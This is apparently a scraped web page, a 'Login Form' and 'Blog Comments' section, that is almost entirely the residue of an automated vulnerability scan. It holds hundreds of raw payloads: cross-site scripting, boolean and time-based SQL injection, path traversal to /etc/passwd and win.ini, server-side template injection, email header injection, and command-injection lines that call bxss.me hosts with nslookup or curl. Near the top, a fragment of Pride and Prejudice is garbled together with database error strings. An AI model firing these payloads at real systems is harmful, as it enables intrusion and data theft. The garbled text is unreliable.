ColdFusion

Login Form



My Resource

Miss Bingley, however, was incapable of disappointing Mr. Darcy in Supplied argument is not a valid MySQL result resource Mrs. Bennet rang the bell, and Miss Elizabeth was summoned to the EZGuestbook him. He now wished it more than ever. Had he done his duty in that userid

Blog Comments





555\u003CScRiPt\4Uz6(9855)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%50%36%53%46%289838%29%3C%2F%73%43%72%69%70%54%3E

555<ScR<ScRiPt>IpT>Glew(9068)</sCr<ScRiPt>IpT>

555\u003CScRiPt\P6SF(9857)\u003C/sCripT\u003E

555&lt

555<ScRiPt >Glew(9447)</ScRiPt>

555&lt

\xf6<img zzz onmouseover=4Uz6(99221) //\xf6>

\xf6<img zzz onmouseover=P6SF(90841) //\xf6>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9251></ScRiPt>

555<input autofocus onfocus=4Uz6(9730)>

555<input autofocus onfocus=P6SF(9702)>

555

555<ScRiPt >Glew(9926)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555

1Cd2Lee8xEO

555

-1 OR 2+735-735-1=0+0+0+1 --

555<svg \xa0onload=Glew(9046)

<a HrEF=http://xss.bxss.me></a>

-1 OR 3+735-735-1=0+0+0+1 --

-1 OR 3*2<(0+5+735-735) --

<a HrEF=jaVaScRiPT:>

555<isindex type=image src=1 onerror=Glew(9709)>

<a HrEF=jaVaScRiPT:>

-1 OR 3*2>(0+5+735-735) --

echo scywjz$()\ ilufpa\nz^xyu||a #' &echo scywjz$()\ ilufpa\nz^xyu||a #|" &echo scywjz$()\ ilufpa\nz^xyu||a #

-1 OR 2+654-654-1=0+0+0+1

response.write(9816750*9251688)

555}body{zzz:Expre/**/SSion(4Uz6(9514))}

../../../../../../../../../../../../../../etc/passwd

555<iframe src='data:text/html

eHMhStfq

555}body{zzz:Expre/**/SSion(P6SF(9033))}

'+response.write(9816750*9251688)+'

-1 OR 3+654-654-1=0+0+0+1

&echo sxifjw$()\ ewflpx\nz^xyu||a #' &echo sxifjw$()\ ewflpx\nz^xyu||a #|" &echo sxifjw$()\ ewflpx\nz^xyu||a #

555&echo mlwazs$()\ wogruf\nz^xyu||a #' &echo mlwazs$()\ wogruf\nz^xyu||a #|" &echo mlwazs$()\ wogruf\nz^xyu||a #

-1 OR 3*2<(0+5+654-654)

"+response.write(9816750*9251688)+"

555

../../../../../../../../../../../../../../windows/win.ini

555I0pRz <ScRiPt >4Uz6(9995)</ScRiPt>

555 bcc:009247.1872-389962.1872.6ed92.19887.2@bxss.me

to@example.com> bcc:009247.1872-389963.1872.6ed92.19887.2@bxss.me

12345'"\'\")

file:///etc/passwd

555<esi:include src="http://bxss.me/rpb.png"/>

555

-1 OR 3*2>(0+5+654-654)

|echo hkgsha$()\ ykklqq\nz^xyu||a #' |echo hkgsha$()\ ykklqq\nz^xyu||a #|" |echo hkgsha$()\ ykklqq\nz^xyu||a #

-1' OR 2+464-464-1=0+0+0+1 --

-1' OR 3+464-464-1=0+0+0+1 --

555|echo ltcegp$()\ zabuxr\nz^xyu||a #' |echo ltcegp$()\ zabuxr\nz^xyu||a #|" |echo ltcegp$()\ zabuxr\nz^xyu||a #

555

555

555

${9999169+9999866}

555

555

555

555

555

../555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

(nslookup -q=cname hitxrjduxnczib84b0.bxss.me||curl hitxrjduxnczib84b0.bxss.me))

-1' OR 3*2<(0+5+464-464) --

-1' OR 3*2>(0+5+464-464) --

$(nslookup -q=cname hitrkidcvuytk18055.bxss.me||curl hitrkidcvuytk18055.bxss.me)

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

./555

)

555&n992505=v983583

555

'.gethostbyname(lc('hitlv'.'cltwvxsl24453.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(73).chr(110).chr(81).'

555

!(()&&!|*|*|

555

Http://bxss.me/t/fit.txt

555

&nslookup -q=cname hitkekqrumycj90a41.bxss.me&'\"`0&nslookup -q=cname hitkekqrumycj90a41.bxss.me&`'

-1' OR 2+253-253-1=0+0+0+1 or 'm6Qjk1PL'='

555<WJXS3N>E9DLY[!+!]</WJXS3N>

-1' OR 3+253-253-1=0+0+0+1 or 'm6Qjk1PL'='

&(nslookup -q=cname hitcvjqclomdw8ab87.bxss.me||curl hitcvjqclomdw8ab87.bxss.me)&'\"`0&(nslookup -q=cname hitcvjqclomdw8ab87.bxss.me||curl hitcvjqclomdw8ab87.bxss.me)&`'

http://bxss.me/t/fit.txt?.jpg

555<body onload=Glew(9711)>

555

^(#$!@#$)(()))******

".gethostbyname(lc("hitbk"."nrcsilkk9e3ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(83).chr(120).chr(73)."

55538GqT <ScRiPt >P6SF(9872)</ScRiPt>

'

555

555

555

/etc/shells

'"()

|(nslookup -q=cname hitohhzchwlpi33370.bxss.me||curl hitohhzchwlpi33370.bxss.me)

-1' OR 3*2<(0+5+253-253) or 'm6Qjk1PL'='

555<ifRAme sRc=9972.com></IfRamE>

-1' OR 3*2>(0+5+253-253) or 'm6Qjk1PL'='

`(nslookup -q=cname hitvxlafetutxda871.bxss.me||curl hitvxlafetutxda871.bxss.me)`

555'&&sleep(27*1000)*ondqzi&&'

c:/windows/win.ini

555<img src=//xss.bxss.me/t/dot.gif onload=Glew(9548)>

555

555

555

555<WV02XT>JUUL0[!+!]</WV02XT>

"

${@print(md5(31337))}

HttP://bxss.me/t/xss.html?%00

555

555

bxss.me

555"&&sleep(27*1000)*exrxzr&&"

-1" OR 2+976-976-1=0+0+0+1 --

555<axm1wnB x=9521>

-1" OR 3+976-976-1=0+0+0+1 --

555

555'||sleep(27*1000)*owwtqs||'

555

555<img src=xyz OnErRor=Glew(9749)>

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(84).concat(108).concat(71)+(require"socket" Socket.gethostbyname("hitmz"+"juhiwdei6bbcf.bxss.me.")[3].to_s)+"

555<ifRAme sRc=9893.com></IfRamE>

bxss.me/t/xss.html?%00

${@print(md5(31337))}\

'.print(md5(31337)).'

555

'+'A'.concat(70-3).concat(22*4).concat(102).concat(88).concat(111).concat(78)+(require'socket' Socket.gethostbyname('hitru'+'clvznjrm02803.bxss.me.')[3].to_s)+'

comments

555

555"||sleep(27*1000)*zctmmb||"

555

-1" OR 3*2<(0+5+976-976) --

555<img sRc='http://attacker-9346/log.php?

-1" OR 3*2>(0+5+976-976) --

555

555

555

555<img/src=">" onerror=alert(9342)>

comments

555

555<auNvZJp x=9820>

555

555

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

comments/.

555

555

555

if(now()=sysdate(),sleep(15),0)

555<aP0Xi21<

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

555

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%6C%65%77%289280%29%3C%2F%73%43%72%69%70%54%3E

555

xfs.bxss.me

555<img sRc='http://attacker-9758/log.php?

555

555

555

555'"()&%<zzz><ScRiPt >QIK1(9567)</ScRiPt>

946083

555

555

555

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

<!--

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

555

555

555

http://xfs.bxss.me?seed.net.tw

555<auij5fG<

'"()&%<zzz><ScRiPt >QIK1(9018)</ScRiPt>

555

555

5559438384

xfs.bxss.me?seed.net.tw

555

555

-1

555

-1)

555

555

//xfs.bxss.me?seed.net.tw

bfg6991\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6991

bfgx6831\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6831

/\xfs.bxss.me?seed.net.tw

555

555

1 waitfor delay '0:0:15' --

8Ac296tw'

555

555

555

-5 OR 893=(SELECT 893 FROM PG_SLEEP(15))--

-5) OR 946=(SELECT 946 FROM PG_SLEEP(15))--

-1)) OR 831=(SELECT 831 FROM PG_SLEEP(15))--

555'"()&%<zzz><ScRiPt >2YJ1(9532)</ScRiPt>

mfyf8W56' OR 684=(SELECT 684 FROM PG_SLEEP(15))--

'"()&%<zzz><ScRiPt >2YJ1(9459)</ScRiPt>

2BncYgz2') OR 623=(SELECT 623 FROM PG_SLEEP(15))--

4anZhNng')) OR 113=(SELECT 113 FROM PG_SLEEP(15))--

555'"()&%<zzz><ScRiPt >iFtH(9212)</ScRiPt>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

555\u003CScRiPt\Glew(9158)\u003C/sCripT\u003E

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

'"()&%<zzz><ScRiPt >iFtH(9954)</ScRiPt>

\<\%\=\{\{\=\{\@\{\#\{\$\{dfb\}\}\%\>

555

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >QIK1(9373)</ScRiPt>

555<script>QIK1(9715)</script>

555<ScR<ScRiPt>IpT>QIK1(9554)</sCr<ScRiPt>IpT>

555&lt

555<ScRiPt >QIK1(9300)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9194></ScRiPt>

\xf6<img zzz onmouseover=Glew(98801) //\xf6>

555<ScRiPt >QIK1(9118)</ScRiPt>

555<input autofocus onfocus=Glew(9623)>

555

555<isindex type=image src=1 onerror=QIK1(9477)>

555

555<isindex type=image src=1 onerror=QIK1(9477)>

<a HrEF=http://xss.bxss.me></a>

555<iframe src='data:text/html

555<body onload=QIK1(9407)>

555<img src=//xss.bxss.me/t/dot.gif onload=QIK1(9583)>

555}body{zzz:Expre/**/SSion(Glew(9190))}

555<img src=xyz OnErRor=QIK1(9254)>

555aVp1f <ScRiPt >Glew(9452)</ScRiPt>

555<img/src=">" onerror=alert(9433)>

555<WJBTBL>VUBVH[!+!]</WJBTBL>

%35%35%35%3C%53%63%52%69%50%74%20%3E%51%49%4B%31%289432%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9311.com></IfRamE>

555\u003CScRiPt\QIK1(9360)\u003C/sCripT\u003E

555&lt

\xf6<img zzz onmouseover=QIK1(91351) //\xf6>

555'"()&%<zzz><ScRiPt >oKlF(9983)</ScRiPt>

555<a3MTU8d x=9602>

555<input autofocus onfocus=QIK1(9428)>

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9048/log.php?

'"()&%<zzz><ScRiPt >oKlF(9319)</ScRiPt>

555<aqFfZgQ<

5559476307

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(QIK1(9195))}

5554QjOy <ScRiPt >QIK1(9799)</ScRiPt>

555<WOILRM>AAOHC[!+!]</WOILRM>

bfg2522\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2522

555<ifRAme sRc=9351.com></IfRamE>

555<a8utmBC x=9229>

555<img sRc='http://attacker-9164/log.php?

555<a0SUhcw<

bfgx5111\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5111

555

555

<%={{={@{#{${dfb}}%>

555

555

<th:t="${dfb}#foreach

555

555'"()&%<zzz><ScRiPt >Calb(9202)</ScRiPt>

555'"()&%<zzz><ScRiPt >DvY7(9866)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'"()&%<zzz><ScRiPt >Calb(9385)</ScRiPt>

5559123604

'"()&%<zzz><ScRiPt >DvY7(9031)</ScRiPt>

555

bfg6031\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6031

5559196007

555'"()&%<zzz><ScRiPt >Jjnc(9968)</ScRiPt>

bfgx1677\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1677

bfg5384\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5384

'"()&%<zzz><ScRiPt >Jjnc(9546)</ScRiPt>

555

bfgx6256\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6256

dfb{{98991*97996}}xca

5559465911

echo baxtph$()\ qfqdhb\nz^xyu||a #' &echo baxtph$()\ qfqdhb\nz^xyu||a #|" &echo baxtph$()\ qfqdhb\nz^xyu||a #

dfb[[${98991*97996}]]xca

555

&echo weqmeu$()\ dmipnb\nz^xyu||a #' &echo weqmeu$()\ dmipnb\nz^xyu||a #|" &echo weqmeu$()\ dmipnb\nz^xyu||a #

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

1CqXA6crtcO

555

../../../../../../../../../../../../../../etc/passwd

555&echo czscon$()\ rpivfy\nz^xyu||a #' &echo czscon$()\ rpivfy\nz^xyu||a #|" &echo czscon$()\ rpivfy\nz^xyu||a #

555 bcc:009247.1874-235269.1874.478bd.19887.2@bxss.me

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

B3XWIOvI

bfg2227\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2227

555

555

<th:t="${dfb}#foreach

555'"()&%<zzz><ScRiPt >71Kw(9677)</ScRiPt>

'+response.write(9900315*9378273)+'

"+response.write(9900315*9378273)+"

12345'"\'\")

555<esi:include src="http://bxss.me/rpb.png"/>

'"()&%<zzz><ScRiPt >71Kw(9007)</ScRiPt>

${9999642+10000073}

555

555<ScRiPt >oKlF(9990)</ScRiPt>

555

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

555

MCVZHTpS

555

bfgx1970\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1970

-1 OR 2+740-740-1=0+0+0+1 --

555&n945313=v993116

Http://bxss.me/t/fit.txt

-1 OR 2+779-779-1=0+0+0+1

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

|echo sbbqyb$()\ zmdsam\nz^xyu||a #' |echo sbbqyb$()\ zmdsam\nz^xyu||a #|" |echo sbbqyb$()\ zmdsam\nz^xyu||a #

555<WLPFCP>FGIFX[!+!]</WLPFCP>

)

!(()&&!|*|*|

555|echo pliuox$()\ vllucn\nz^xyu||a #' |echo pliuox$()\ vllucn\nz^xyu||a #|" |echo pliuox$()\ vllucn\nz^xyu||a #

'.gethostbyname(lc('hitjw'.'exgdawuib485e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(70).chr(116).chr(78).'

555

-1' OR 2+479-479-1=0+0+0+1 --

555

-1' OR 2+11-11-1=0+0+0+1 or 'FcvI6kNZ'='

dfb{{98991*97996}}xca

555

".gethostbyname(lc("hitnz"."riumqyfb1eaea.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(78).chr(99).chr(83)."

(nslookup -q=cname hitxsmfugbfhj4ea46.bxss.me||curl hitxsmfugbfhj4ea46.bxss.me))

^(#$!@#$)(()))******

/etc/shells

555

$(nslookup -q=cname hitzfnanpirlo06161.bxss.me||curl hitzfnanpirlo06161.bxss.me)

'

555

-1" OR 2+724-724-1=0+0+0+1 --

555

555

c:/windows/win.ini

bxss.me

1'"

dfb{98991*97996}xca

555

"

&nslookup -q=cname hitrxjxyxxesd84255.bxss.me&'\"`0&nslookup -q=cname hitrxjxyxxesd84255.bxss.me&`'

../../../../../../../../../../../../../../windows/win.ini

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

1\xc0\xa7\xc0\xa2%2527%2522

555

555

555

file:///etc/passwd

555'"()&%<zzz><ScRiPt >NZZK(9368)</ScRiPt>

"+"A".concat(70-3).concat(22*4).concat(112).concat(89).concat(115).concat(82)+(require"socket" Socket.gethostbyname("hitzo"+"uijqckkkf0fc6.bxss.me.")[3].to_s)+"

555

${@print(md5(31337))}

&(nslookup -q=cname hitzajztekofw7696c.bxss.me||curl hitzajztekofw7696c.bxss.me)&'\"`0&(nslookup -q=cname hitzajztekofw7696c.bxss.me||curl hitzajztekofw7696c.bxss.me)&`'

555

HttP://bxss.me/t/xss.html?%00

555

555<script>oKlF(9205)</script>

comments

${@print(md5(31337))}\

555

'+'A'.concat(70-3).concat(22*4).concat(102).concat(77).concat(120).concat(87)+(require'socket' Socket.gethostbyname('hitag'+'nevvbshv02f72.bxss.me.')[3].to_s)+'

555

'"()

@@mYk3S

555

dfb${98991*97996}xca

|(nslookup -q=cname hitzjyqnkesgv2969b.bxss.me||curl hitzjyqnkesgv2969b.bxss.me)

bxss.me/t/xss.html?%00

../555

555<ScR<ScRiPt>IpT>oKlF(9816)</sCr<ScRiPt>IpT>

555

'"()&%<zzz><ScRiPt >NZZK(9941)</ScRiPt>

comments

'.print(md5(31337)).'

555

555'&&sleep(27*1000)*wflyql&&'

555

`(nslookup -q=cname hitxkddjwcdrg4f0de.bxss.me||curl hitxkddjwcdrg4f0de.bxss.me)`

555

555

555

555<ScRiPt >oKlF(9282)</ScRiPt>

555

dfb#{98991*97996}xca

555"&&sleep(27*1000)*pydswn&&"

dfb{{98991*97996}}xca

comments/.

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555'||sleep(27*1000)*cmarry||'

555

xfs.bxss.me

555

5559219846

555

555

555

555

555

555"||sleep(27*1000)*dfyrmf||"

555

dfb{{98991*97996}}xca

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9799></ScRiPt>

dfb{#98991*97996}xca

dfb[[${98991*97996}]]xca

555

555

555

'"

555'"()&%<zzz><ScRiPt >TYKL(9816)</ScRiPt>

555

555

dfb[[${98991*97996}]]xca

555

555

'"()&%<zzz><ScRiPt >TYKL(9010)</ScRiPt>

bfg2273\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2273

555

555

<!--

555

dfb{@98991*97996}xca

555

5559165902

555

555<ScRiPt >oKlF(9022)</ScRiPt>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555

555

555

555

555

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx5941\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5941

555

555

555

dfb{{=98991*97996}}xca

555

555

555<svg \xa0onload=oKlF(9343)

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555

555

555

<%={{={@{#{${dfb}}%>

dfb@(98991*97996)xca

555<ScRiPt >Jjnc(9532)</ScRiPt>

555

555

555

555<WGAH2J>BC3MF[!+!]</WGAH2J>

555<isindex type=image src=1 onerror=oKlF(9197)>

555<ScRiPt >DvY7(9738)</ScRiPt>

<th:t="${dfb}#foreach

555

555

555

dfb<%=98991*97996%>xca

555<script>Jjnc(9816)</script>

555

555

555

555

555<iframe src='data:text/html

555<WHY6GL>NIPVY[!+!]</WHY6GL>

555

dfb#set($x=98991*97996)${x}xca

555

555

555

555<script>DvY7(9717)</script>

555

555<ScR<ScRiPt>IpT>Jjnc(9407)</sCr<ScRiPt>IpT>

555

555<ScR<ScRiPt>IpT>DvY7(9482)</sCr<ScRiPt>IpT>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{"abc"|title}}xca

555<ScRiPt >Jjnc(9403)</ScRiPt>

555<body onload=oKlF(9641)>

555

555<ScRiPt >DvY7(9021)</ScRiPt>

555

dfb{{98991*97996}}xca

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9099></ScRiPt>

dfb[[${98991*97996}]]xca

print("dfb" . 98991*97996 . "xca")

555<img src=//xss.bxss.me/t/dot.gif onload=oKlF(9961)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9562></ScRiPt>

555<ScRiPt >Jjnc(9758)</ScRiPt>

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >l4tn(9869)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >NZZK(9229)</ScRiPt>

555

555

555<ScRiPt >DvY7(9196)</ScRiPt>

555<svg \xa0onload=Jjnc(9891)

555<img src=xyz OnErRor=oKlF(9181)>

98991*97996*98991*97996

'"()&%<zzz><ScRiPt >l4tn(9750)</ScRiPt>

555<img/src=">" onerror=alert(9568)>

dfb{@math key=98991 method="multiply" operand=97996/}xca

dfb{{{this}}}xca

555

555<isindex type=image src=1 onerror=Jjnc(9664)>

555<svg \xa0onload=DvY7(9270)

555

#{98991*97996*98991*97996}

5559475203

555<isindex type=image src=1 onerror=DvY7(9174)>

555<iframe src='data:text/html

555<ScRiPt >NZZK(9747)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%4B%6C%46%289091%29%3C%2F%73%43%72%69%70%54%3E

dfb#{xca}=123

bfg1532\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1532

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9705></ScRiPt>

555<iframe src='data:text/html

555<body onload=Jjnc(9026)>

555\u003CScRiPt\oKlF(9249)\u003C/sCripT\u003E

555<body onload=DvY7(9566)>

555<img src=//xss.bxss.me/t/dot.gif onload=Jjnc(9080)>

555&lt

dfb{{'abcd'.toUpperCase()}}xca

555'"()&%<zzz><ScRiPt >uTvG(9495)</ScRiPt>

555<ScRiPt >NZZK(9522)</ScRiPt>

\xf6<img zzz onmouseover=oKlF(98151) //\xf6>

bfgx7857\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7857

555'"()&%<zzz><ScRiPt >xmaL(9762)</ScRiPt>

'"()&%<zzz><ScRiPt >uTvG(9625)</ScRiPt>

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<img src=//xss.bxss.me/t/dot.gif onload=DvY7(9360)>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=oKlF(9690)>

555<img src=xyz OnErRor=Jjnc(9159)>

'"()&%<zzz><ScRiPt >xmaL(9188)</ScRiPt>

5559446240

555<svg \xa0onload=NZZK(9439)

<a HrEF=http://xss.bxss.me></a>

555

555<img/src=">" onerror=alert(9834)>

555<img src=xyz OnErRor=DvY7(9006)>

dfb{{98991*97996}}xca

5559184137

<a HrEF=jaVaScRiPT:>

555<isindex type=image src=1 onerror=NZZK(9342)>

bfg5692\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5692

bfg9336\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9336

<th:t="${dfb}#foreach

555<img/src=">" onerror=alert(9879)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%6A%6E%63%289304%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

555<iframe src='data:text/html

555

bfgx8983\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8983

bfgx8550\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8550

555\u003CScRiPt\Jjnc(9020)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(oKlF(9549))}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=NZZK(9016)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%76%59%37%289630%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555uKooD <ScRiPt >oKlF(9746)</ScRiPt>

555\u003CScRiPt\DvY7(9392)\u003C/sCripT\u003E

555<img src=//xss.bxss.me/t/dot.gif onload=NZZK(9523)>

555&lt

555

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

\xf6<img zzz onmouseover=Jjnc(96311) //\xf6>

555<WOBGCF>CULM7[!+!]</WOBGCF>

555<ScRiPt >Calb(9080)</ScRiPt>

555<input autofocus onfocus=Jjnc(9884)>

<th:t="${dfb}#foreach

555&lt

555<img src=xyz OnErRor=NZZK(9589)>

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

555<ifRAme sRc=9845.com></IfRamE>

555<img/src=">" onerror=alert(9376)>

555

<a HrEF=http://xss.bxss.me></a>

555<WLBDWK>APXYO[!+!]</WLBDWK>

\xf6<img zzz onmouseover=DvY7(95581) //\xf6>

555

dfb[[${98991*97996}]]xca

555<script>Calb(9562)</script>

555<ad64dVv x=9714>

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=DvY7(9373)>

dfb__${98991*97996}__::.x

555<img sRc='http://attacker-9882/log.php?

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555

555<ScR<ScRiPt>IpT>Calb(9763)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

555}body{zzz:Expre/**/SSion(Jjnc(9463))}

dfb__${98991*97996}__::.x

555<a8wcMB9<

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >l4tn(9501)</ScRiPt>

dfb{{98991*97996}}xca

\xf6<img zzz onmouseover=NZZK(94661) //\xf6>

555<ScRiPt >Calb(9979)</ScRiPt>

555duQi8 <ScRiPt >Jjnc(9326)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9844></ScRiPt>

555<input autofocus onfocus=NZZK(9454)>

dfb[[${98991*97996}]]xca

555<script>xmaL(9936)</script>

<a HrEF=jaVaScRiPT:>

555<WBTGFS>FVHIC[!+!]</WBTGFS>

555'"()&%<zzz><ScRiPt >DUfq(9582)</ScRiPt>

555<ScRiPt >Calb(9001)</ScRiPt>

555<ScR<ScRiPt>IpT>xmaL(9194)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(DvY7(9204))}

555<WXKU7J>UPYRG[!+!]</WXKU7J>

555<ifRAme sRc=9681.com></IfRamE>

555<svg \xa0onload=Calb(9069)

dfb__${98991*97996}__::.x

<a HrEF=http://xss.bxss.me></a>

'"()&%<zzz><ScRiPt >DUfq(9726)</ScRiPt>

555<ScRiPt >xmaL(9369)</ScRiPt>

555<isindex type=image src=1 onerror=Calb(9230)>

555FmzNN <ScRiPt >DvY7(9594)</ScRiPt>

555<script>l4tn(9081)</script>

555<asP4Naf x=9139>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9580></ScRiPt>

5559858388

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScR<ScRiPt>IpT>l4tn(9136)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<WA15YF>MASMO[!+!]</WA15YF>

555<iframe src='data:text/html

bfg9150\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9150

555<img sRc='http://attacker-9266/log.php?

555<ScRiPt >uTvG(9132)</ScRiPt>

555<ScRiPt >xmaL(9886)</ScRiPt>

555<ifRAme sRc=9717.com></IfRamE>

555<body onload=Calb(9088)>

555<aVnxQfb<

555<WQWN2N>RP45Q[!+!]</WQWN2N>

555}body{zzz:Expre/**/SSion(NZZK(9947))}

bfgx2381\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2381

555<svg \xa0onload=xmaL(9728)

555'"()&%<zzz><ScRiPt >Xqn3(9646)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=Calb(9618)>

555<script>uTvG(9897)</script>

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=xmaL(9049)>

555<anN0GJ0 x=9552>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9814></ScRiPt>

555rW3ju <ScRiPt >NZZK(9152)</ScRiPt>

555<img src=xyz OnErRor=Calb(9755)>

555<ScR<ScRiPt>IpT>uTvG(9984)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >Xqn3(9668)</ScRiPt>

555<img/src=">" onerror=alert(9257)>

555<ScRiPt >l4tn(9112)</ScRiPt>

555

555<iframe src='data:text/html

555<img sRc='http://attacker-9921/log.php?

<th:t="${dfb}#foreach

555<svg \xa0onload=l4tn(9446)

5559748048

555<ScRiPt >uTvG(9398)</ScRiPt>

555<WOIPLN>23MNV[!+!]</WOIPLN>

555<a4e81GW<

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%43%61%6C%62%289286%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=xmaL(9774)>

555<ifRAme sRc=9103.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9781></ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=xmaL(9349)>

bfg6229\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6229

555<isindex type=image src=1 onerror=l4tn(9322)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >uTvG(9908)</ScRiPt>

555\u003CScRiPt\Calb(9004)\u003C/sCripT\u003E

555<aXVtIrD x=9596>

555<img src=xyz OnErRor=xmaL(9984)>

bfgx10472\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10472

555<iframe src='data:text/html

555

555<svg \xa0onload=uTvG(9205)

555&lt

555<img sRc='http://attacker-9116/log.php?

<%={{={@{#{${dfb}}%>

\xf6<img zzz onmouseover=Calb(91661) //\xf6>

555<img/src=">" onerror=alert(9596)>

555<body onload=l4tn(9186)>

dfb{{98991*97996}}xca

555<isindex type=image src=1 onerror=uTvG(9391)>

555'"()&%<zzz><ScRiPt >ZdqM(9980)</ScRiPt>

